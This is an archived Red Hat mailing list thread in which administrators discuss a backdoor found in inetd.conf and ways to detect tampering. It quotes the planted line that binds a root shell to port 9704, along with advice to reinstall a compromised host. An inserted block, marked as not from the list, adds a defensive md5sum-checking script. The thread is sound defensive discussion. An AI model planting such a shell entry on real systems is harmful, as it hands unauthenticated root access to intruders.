I was just thinking. I know there's tripwire and stuff. but it would be 
neat to have cron run a script, that did md5sum "checks" on various things, 
and mailed you, if the sum changed on anything that's in its list. Anyone 
have anything like that? I know practically nothing about scripting, but how 
hard would that be to write?  Seems like it would go something like this:

For every file in /etc/this_script's.conf, do "$file /path/to/md5sum" > 
/var/log/today's_copy. and diff /var/log/today's_copy against 
/var/log/yesterday's_copy, if today's_copy != yesterday's_copy, mail root

OTOH maybe I'm just silly ;-)

                 JW
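The cron job sketched above, written out as an added example (this is not a script from the post or from the list): a POSIX sh script that hashes every file named in a config list, compares the result with the previous run, and mails root when anything differs. The paths (`/etc/md5check.conf`, `/var/lib/md5check`), the environment variable names and the `run` argument are assumptions made for this example.

```shell
#!/bin/sh
# Checksum watch along the lines sketched in the post above: hash every file
# named in a config list, diff the result against the previous run, and mail
# root when anything differs. The paths, variable names and the "run" argument
# are assumptions chosen for this example, not anything from the thread.
set -u

CONF="${MD5CHECK_CONF:-/etc/md5check.conf}"    # one path per line, '#' comments
STATE="${MD5CHECK_STATE:-/var/lib/md5check}"   # keeps the previous run's list
MAILTO="${MD5CHECK_MAILTO:-root}"

# hash_list CONFFILE: print one "md5  path" line per listed file, in list order.
# A file that has vanished is recorded as MISSING so a deletion is noticed too.
hash_list() {
    while IFS= read -r f || [ -n "$f" ]; do
        case "$f" in ''|\#*) continue ;; esac
        if [ -f "$f" ]; then
            md5sum -- "$f"
        else
            printf 'MISSING  %s\n' "$f"
        fi
    done < "$1"
}

# compare_lists OLD NEW: return 0 when the two lists are identical; otherwise
# print the differing entries as "was:"/"now:" lines (the mail body) and return 1.
compare_lists() {
    if cmp -s -- "$1" "$2"; then
        return 0
    fi
    diff -- "$1" "$2" | sed -n -e 's/^< /was: /p' -e 's/^> /now: /p'
    return 1
}

# run_check: the cron entry point. The first run only records a baseline, so it
# must be taken on a system you already trust; a compromise that predates the
# baseline cannot be detected by comparing against that baseline.
run_check() {
    [ -r "$CONF" ] || { echo "md5check: cannot read $CONF" >&2; return 2; }
    mkdir -p -- "$STATE"
    hash_list "$CONF" > "$STATE/today"
    if [ -f "$STATE/yesterday" ]; then
        report=$(compare_lists "$STATE/yesterday" "$STATE/today") ||
            printf '%s\n' "$report" |
                mail -s "md5check: changed files on $(hostname)" "$MAILTO"
    fi
    mv -f -- "$STATE/today" "$STATE/yesterday"
}

# Example cron line (assumed install path):  0 3 * * * /usr/local/sbin/md5check run
case "${1:-}" in run) run_check ;; esac
```

Two practical points the thread itself raises: the baseline list is only as trustworthy as the machine was when it was taken, and an intruder who already has root can edit both the list and the script, so keep a copy of the baseline off the box (or on read-only media) and compare against that. On a current system `sha256sum` is a drop-in replacement for `md5sum` with the same output format.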


>I thought I'd check out my inetd.conf too.  I'd been looking
>at the log files daily, and I was using "snort" to
>watch for suspicious activity (mind you, I'm little
>more than a mere novice)
>
>Same damn line.  Looks like I know what I'm doing this
>weekend.... and learning IPCHAINS.
>
>Thanks, all.  I would probably have never thought to look
>there.
>
>Mark
>
>
> >
> > Date: Mon, 11 Sep 2000 16:22:58 -0500
> > From: "Michael R. Jinks" <[EMAIL PROTECTED]>
> > To: [EMAIL PROTECTED]
> > Subject: Re: highly suspicious line in inetd.conf
> > Reply-To: [EMAIL PROTECTED]
> >
> > On Mon, Sep 11, 2000 at 02:04:37PM -0700, wYRd wrote:
> > >
> > > Looking over a clients system I found the following
> > > line in inetd.conf:
> > >   9704 stream tcp nowait root /bin/sh sh -i
> >
> > EEK!
> >
> > > telnet to the port and instant root access.
> >
> > Yup.
> >
> > > A quick look around didn't reveal any obvious
> > > problems.  I'm worried about the non-obvious
> > > now.
> >
> > Good man.
> >
> > > any suggestions for things to do and places
> > > to poke into would be appreciated.
> >
> > Well...
> >
> > > (is it likely the system was compromised for
> > > future use?)
> >
> > I'd say so, yes.  And in that case all bets are off; they could have left
> > behind just about anything as a back door or other malicious stuff, the only
> > way you can really be sure they're gone (whoever "they" are) is to reinstall
> > from bare metal. :(
> >
> > Don't really know what your setup is like or how long they've owned your box,
> > but hopefully you've kept good logs and backups of your system so that you can
> > have some idea of when the inetd.conf file was compromised (do old backup
> > versions of the file have that line as well?  how far back?) and can then
> > cross-reference to that date in your old log files.  But even then all you'd
> > get would be some indication of when and how they got in, and maybe some clues
> > about what they did once they got there.  It's almost impossible to guarantee
> > that you've undone the damage unless you were running tripwire or some other
> > equivalent.
> >
> > This is a pretty klutzy way of owning a system, whoever did this was either
> > (a) not real slick or (b) not at all concerned about being the only person
> > who could own your box.  But that doesn't mean that they didn't hide their
> > tracks well elsewhere.  Best bet is to take the machine down (at least off
> > the network), secure any vital data, wipe it, and start over.  Sorry.
> >
> > Cheers,
> > -m
> > --
> > Michael Jinks, IB
> > Systems Administrator, CCCP
> > finger [EMAIL PROTECTED] for public key
> > Vote Duke! http://www.entertaindom.com/pages/duke2000/home.jsp
> >
> > >
>



_______________________________________________
Redhat-list mailing list
[EMAIL PROTECTED]
https://listman.redhat.com/mailman/listinfo/redhat-list